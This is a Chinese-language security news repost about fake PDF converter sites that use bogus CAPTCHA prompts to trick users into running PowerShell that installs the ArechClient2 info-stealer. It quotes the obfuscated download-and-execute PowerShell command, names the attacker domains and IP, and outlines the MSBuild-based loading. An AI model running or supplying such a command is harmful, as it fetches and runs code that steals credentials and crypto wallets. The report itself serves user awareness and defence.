更多全球网络安全资讯尽在邑安全
网络犯罪分子发起了一项复杂的恶意软件活动,利用模仿流行的合法服务 PDFCandy 的虚假 PDF 到 DOCX 转换器网站。
恶意网站,包括 candyxpdf[.] 等域。com 和 CandyConverterPDF[.]com 部署了一种精心设计的社会工程策略,旨在从寻求转换文档格式的毫无戒心的用户那里收集敏感信息。
当用户尝试在这些欺诈平台上转换文档时,他们会看到一个看似合法的界面,其中包含动画加载序列和熟悉的转换选项。
上传文件后,受害者会遇到一个虚假的 CAPTCHA 验证,该验证指示他们按 Windows+R 并粘贴伪装的 PowerShell 命令。执行此命令时,会启动一个复杂的感染链,最终部署 ArechClient2 信息窃取程序。
CloudSEK 研究人员发现,该恶意软件是危险的 SectopRAT 家族的变体,该家族自 2019 年以来一直活跃。
他们的分析显示,该攻击采用了多阶段重定向过程,连接到“bind-new-connect[.]click“,然后下载托管在 IP 地址 172 上的恶意 ”adobe.zip“ 有效负载。86[.]115[.]43.
这种攻击的影响是严重的,因为该恶意软件专门设计用于从受感染的系统中收集浏览器凭据、加密货币钱包信息和其他敏感数据。
该感染展示了先进的规避技术,包括滥用合法的 Windows 实用程序来绕过安全控制。
恶意软件活动的思维导图
感染机制分析
此攻击的核心依赖于用户无意中执行的混淆 PowerShell 命令:-
powershell -win 1 -ep bypass -noni -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgB1AHQALgBXAGUAYgBDAG8AYQBKAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ΘΑΥQANACKAIAB8ACAASQBFAHgA
audiobit.exe
此编码命令会发起一个 Web 请求来下载“adobe.zip”存档,其中包含多个文件,包括恶意的“audiobit[.]exe“ 可执行文件。
执行时,此文件会启动一个合法的 Windows 实用程序 MSBuild.exe,通过一种称为 living-off-the-land 的技术加载 ArechClient2 恶意软件。
该恶意软件执行多种可疑作,包括注册表查询、系统信息发现和凭据搜寻。
该恶意软件会访问机器 GUID、计算机名称并检查支持的语言,然后再继续收集敏感数据,包括存储的密码和加密货币钱包凭据。
建议用户仅使用来自官方来源的受信任的文件转换工具,并对任何请求命令行执行的网站保持警惕,无论界面看起来多么合法。
原文来自: cybersecuritynews.com
原文链接: https://cybersecuritynews.com/beware-of-online-pdf-converters-that-tricks-users/
原文始发于微信公众号(邑安全):当心在线PDF转换器诱骗用户安装窃取密码的恶意软件
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论